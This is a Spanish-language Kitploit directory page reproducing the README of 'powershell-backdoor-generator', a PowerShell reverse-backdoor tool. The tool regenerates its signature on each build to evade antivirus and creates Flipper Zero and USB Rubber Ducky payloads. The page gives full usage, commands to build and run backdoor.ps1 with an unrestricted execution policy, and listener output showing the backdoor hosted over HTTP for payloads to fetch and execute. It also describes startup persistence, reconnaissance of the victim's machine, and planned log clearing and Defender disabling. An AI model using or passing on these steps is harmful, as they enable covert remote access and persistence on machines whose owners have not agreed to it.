Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
powershell-backdoor-generator — Puerta trasera inversa escrita en PowerShell y ofuscada con Python. Genera payloads para dispositivos de hacking populares como Flipper Zero y Hak5 USB Rubber Ducky, y cambia su firma después de cada compilación para ayudar a evitar el AV. | Kitploit
Herramientas/GitHubGitHub/drew-alleman/powershell-backdoor-generator
Generación de PayloadsGeneración de Shellcode
GitHubdrew-alleman/powershell-backdoor-generator

powershell-backdoor-generator

Puerta trasera inversa escrita en PowerShell y ofuscada con Python. Genera payloads para dispositivos de hacking populares como Flipper Zero y Hak5 USB Rubber Ducky, y cambia su firma después de cada compilación para ayudar a evitar el AV.

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
41365hace 3 añosRevisado por Kitploit

/******************************************************************************

  • DESCARGO DE RESPONSABILIDAD:
  • Este programa está destinado únicamente a fines educativos. Al usar este programa,
  • acepta que comprende los posibles riesgos asociados con su uso.
    • Este programa no debe utilizarse en ningún sistema o red sin la debida
  • autorización. El uso no autorizado está estrictamente prohibido.
    • El creador de este programa no asume ninguna responsabilidad por daños,
  • consecuencias legales o pérdida de datos causados por el uso de este programa.
    • Es su responsabilidad asegurarse de cumplir con todas las leyes y regulaciones
  • aplicables mientras utiliza este programa.
  • Por favor, use este programa de manera responsable y ética, y respete la privacidad
  • y seguridad de los demás. *****************************************************************************/

powershell-backdoor

Guía
Herramienta de puerta trasera inversa escrita en PowerShell y ofuscada con Python, proporcionando una nueva firma tras cada compilación para evitar la detección. La herramienta tiene la capacidad de crear payloads para dispositivos de hacking populares como Flipper Zero y Hak5 USB Rubber Ducky. Utilice esta herramienta para probar las defensas de su sistema contra técnicas de ataque avanzadas.

root@kitploit:~
usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
                 [--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]

Powershell Backdoor Generator

options:
  -h, --help            show this help message and exit
  --ip-address IP_ADDRESS, -i IP_ADDRESS
                        IP Address to bind the backdoor too (default: 192.168.X.XX)
  --port PORT, -p PORT  Port for the backdoor to connect over (default: 4444)
  --random, -r          Randomizes the outputed backdoor's file name
  --out OUT, -o OUT     Specify the backdoor filename (relative file names)
  --verbose, -v         Show verbose output
  --delay DELAY         Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
  --flipper FLIPPER     Payload file for flipper zero (includes EOL conversion) (relative file name)
  --ducky               Creates an inject.bin for the http server
  --server-port SERVER_PORT
                        Port to run the HTTP server on (--server) (default: 8080)
  --payload PAYLOAD     USB Rubber Ducky/Flipper Zero backdoor payload to execute
  --list--payloads      List all available payloads
  -k KEYBOARD, --keyboard KEYBOARD
                        Keyboard layout for Bad Usb/Flipper Zero (default: us)
  -A, --actually-listen
                        Just listen for any backdoor connections
  -H, --listen-and-host
                        Just listen for any backdoor connections and host the backdoor directory

Enlaces rápidos

  • Vista previa
  • Características
  • Puerta trasera estándar
  • Puerta trasera para Flipper Zero
  • Puerta trasera para USB Rubber Ducky
  • Agradecimientos
  • Pendientes
  • Salida de 5 ofuscaciones

Vista previa

vista previa

Características

  • Payload para Hak5 Rubber Ducky
  • Payload para Flipper Zero
  • Descargar archivos del sistema remoto
  • Reproducir archivos wav desde una URL
  • Obtener la dirección IP pública del equipo objetivo
  • Listar usuarios locales
  • Encontrar archivos interesantes
  • Recopilar información sobre el sistema operativo del objetivo
  • Obtener información del BIOS del sistema objetivo
  • Verificar si hay software antivirus instalado y su estado actual
  • Obtener clientes TCP activos
  • Instalar Chocolatey, un popular gestor de paquetes para Windows (https://chocolatey.org/)
  • Verificar si hay software común de pentesting instalado en el sistema objetivo.

Puerta trasera estándar

root@kitploit:~
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

Se creará un archivo llamado backdoor.ps1 en el directorio de trabajo actual.

Ejecución de la puerta trasera

Probado en Windows 11, Windows 10 y Kali Linux. Para ejecutarlo como una ventana oculta y con persistencia, siga la guía aquí

root@kitploit:~
powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
root@kitploit:~
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1

Ataques Bad USB / USB Rubber Ducky

Al usar cualquiera de estos ataques, abrirá un servidor HTTP que aloja la puerta trasera. Una vez que se recupere la puerta trasera, el servidor HTTP se cerrará.

Payloads

  • Execute — Ejecuta la puerta trasera
  • BindAndExecute — Coloca la puerta trasera en el directorio temporal del usuario, la vincula al inicio y luego la ejecuta (Requiere permisos de administrador)

Puerta trasera para Flipper Zero

Lo siguiente generará un archivo llamado powershell_backdoor.txt, que al activarse en el Flipper descargará la puerta trasera de su computadora a través de HTTP y la ejecutará.

root@kitploit:~
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

Coloque el archivo de texto que haya especificado (por ejemplo: powershell_backdoor.txt) en su Flipper Zero. Cuando se ejecute el payload, descargará y ejecutará backdoor.ps1.

Puerta trasera para USB Rubber Ducky

A continuación se muestra un tutorial sobre cómo generar un archivo inject.bin para el Hak5 USB Rubber Ducky.

root@kitploit:~
 C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

Se colocará un archivo llamado inject.bin en su directorio de trabajo actual. Java es necesario para esta función. Cuando se ejecute el payload, descargará y ejecutará backdoor.ps1.

Agradecimientos

Para codificar payload.txt en inject.bin para ataques USB Rubber Ducky, utilizo encoder.jar creado por midnitesnake.

Pendientes

  • Obtener conexiones RDP recientes
  • Cambiar fondo de pantalla desde URL
  • Encontrar directorios con permisos de escritura
  • Limpiar registros
  • Deshabilitar Defender

Salida de 5 ofuscaciones

A continuación se muestra el hash sha1 de backdoor.ps1 tras 5 compilaciones.

root@kitploit:~
1e158f02484e5c58d74c1507a1773392ffacfca2
6d18230a419195d0f77519abc0238768956cdd58
558a8cbac40239c9e6660a45cc8fc5d02b5057d7
caf4d0c8424eceb960d5f5c526e83ecd485c4ac9
947b57824917842d79f9cbcac8a795aa7c2f8a49
Descargar herramienta